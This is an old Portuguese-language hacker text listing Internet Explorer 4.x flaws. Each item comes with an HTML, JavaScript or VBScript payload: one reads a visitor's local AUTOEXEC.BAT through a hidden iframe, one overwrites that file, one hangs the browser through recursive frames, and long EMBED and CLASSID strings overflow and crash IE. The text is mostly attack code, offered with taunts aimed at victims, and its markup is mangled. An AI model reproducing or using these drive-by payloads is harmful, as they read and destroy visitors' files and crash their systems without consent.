HeHe é vc pode fazer cada coisa com o cara que estiver usando o explorer que vc nem imagina, dá até pra ver o autoexec do cara. A Micro$oft com a pressa de seus lançamentos fez cada burrada no explorer que descoberta por hackers fez com que desse para explorar todas as falhas com simples scripts. Se vc quer se defender vc tem que tirar o explorer 4.x ou inferior, no 5 as falhas diminuiram bastante mas se vc quer nenhuma falha use o Netscape ou o Opera que são excelentes navegadores. Aí está as falhas do IE:
#BUG 1#
#Esse bug no IE 4, faz com que em 5 segundos o conteudo
do
AUTOEXEC.BAT seja mostrado numa caixa de texto.
Demostrando q se esse
script
for usado para fins maliciosos, dados importantes podem
ser capturados.#
*HTML*
*HEAD*
*TITLE*
*/TITLE*
*/HEAD*
*BODY onLoad="init()"*
*SCRIPT LANGUAGE="JavaScript"*
function init()
{
document.all("MyFrame1").src = 'file://c:/autoexec.bat';
setTimeout ('getLinks()', 5000);
}
function getLinks()
{alert(document.all("MyFrame1").document.body.outerHTML);
}
*/SCRIPT*
*IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1"
SRC="blank.html"*
*/BODY*
*/HTML*
-----------------------------------------------
BUG 2#
Faz com que o IE entre em loop, abrindo a pagina bug.htm
infinitamente. Causando o seu travamento.
*HTML*
*HEAD*
*TITLE*
*/TITLE*
*/HEAD*
*FRAMESET ROWS = 50%,50%* v
*FRAME SRC = "bug.htm"*
*FRAME SRC = "bug.htm"*
*/FRAMESET*
*BODY*
*/BODY>
*/HTML>
------------------------------------------
#BUG 3# Vulnerable : IE 4.x e VBScript Engine 3.x
Descricao: Com essa falha de seguranca na linguagem VBScript, vc
pode
rodar scripts maliciosos para sobreescrever arquivos.
*HTML>
*HEAD> */HEAD>
*BODY>*SCRIPT LANGUAGE="VBSCRIPT">
Set fs = CreateObject#"Scripting.FileSystemObject" #
Set a = fs.CreateTextFile#"C:\AUTOEXEC.BAT", True #
a.WriteLine#"@echo off"#
a.WriteLine#"echo This is a test."#
a.WriteLine#"pause"#
a.WriteLine#"@echo on"#
a.Close
*/SCRIPT>
O seu arquivo "AUTOEXEC.BAT" foi sobreescrito!
*/BODY>
*/HTML>
---------------------------------------------------
#BUG 4#
Vulnerable : IE 4.0
Descricao: Causa overflow no IE, e como decorrente o seu travamento.
*HTML>
SuCkEr!!!
*EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456
7890123456789012345678901234567890123456789>
40
80
160 170 180
190 200
*/HTML>
------------------------------------------------
#BUG 7#
>>>Funciona com: IE 4.0
>>>Descricao: dah uma mensagem de Operacaum Ilegal e
fecha o browser ou
uma
tela azul de Erro Fatal e vc terah que rebootar a
maquina.
Trying to crash IE 4.0
CLASSID=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
111>